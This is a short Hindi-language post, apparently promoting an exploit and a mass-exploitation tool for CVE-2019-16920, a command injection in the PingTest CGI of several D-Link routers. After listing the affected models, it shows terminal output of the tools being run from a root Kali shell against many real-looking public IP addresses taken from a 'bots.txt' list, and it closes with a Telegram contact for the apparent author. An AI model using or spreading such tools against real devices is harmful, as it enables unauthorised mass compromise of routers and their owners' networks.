
CVE-2019-16920 के लिए एक्सप्लॉइट और मास Pwn3r
निम्नलिखित D-Link उत्पादों के नवीनतम फर्मवेयर में भेद्यता पाई गई: DIR-655 DIR-866L DIR-652 DHP-1565
D-Link उत्पादों जैसे DIR-655C, DIR-866L, DIR-652, और DHP-1565 में बिना प्रमाणीकरण के दूरस्थ कोड निष्पादन होता है। यह समस्या तब उत्पन्न होती है जब हमलावर "PingTest" डिवाइस कॉमन गेटवे इंटरफ़ेस में मनमाना इनपुट भेजता है, जिससे कमांड इंजेक्शन हो सकता है। एक हमलावर जो सफलतापूर्वक कमांड इंजेक्शन ट्रिगर करता है, वह पूर्ण सिस्टम समझौता प्राप्त कर सकता है। बाद में, स्वतंत्र रूप से पाया गया कि ये भी प्रभावित हैं: DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, और DIR-825।
root@kali:~# python3 CVE-2019-16920.py 195.208.166.41 8081 ls
[*]Sending payload
[*]Exploited!
root@kali:~#
root@kali:~# python3 CVE-2019-16920-MassPwn3r.py bots.txt 8081 id
[*]Exploiting: 195.208.166.41
[!]Unable to connect to host
[!]Unable to connect to host
[*]Exploiting: 83.243.166.37
[*]Exploiting: 74.95.133.33
[*]Exploiting: 97.89.64.118
[*]Exploiting: 66.162.68.154
[!]Unable to connect to host
[*]Exploiting: 72.47.152.161
[*]Exploiting: 97.93.250.209
[*]Exploiting: 183.207.196.64
root@kali:~#
टेलीग्राम:@eth_hacker0x18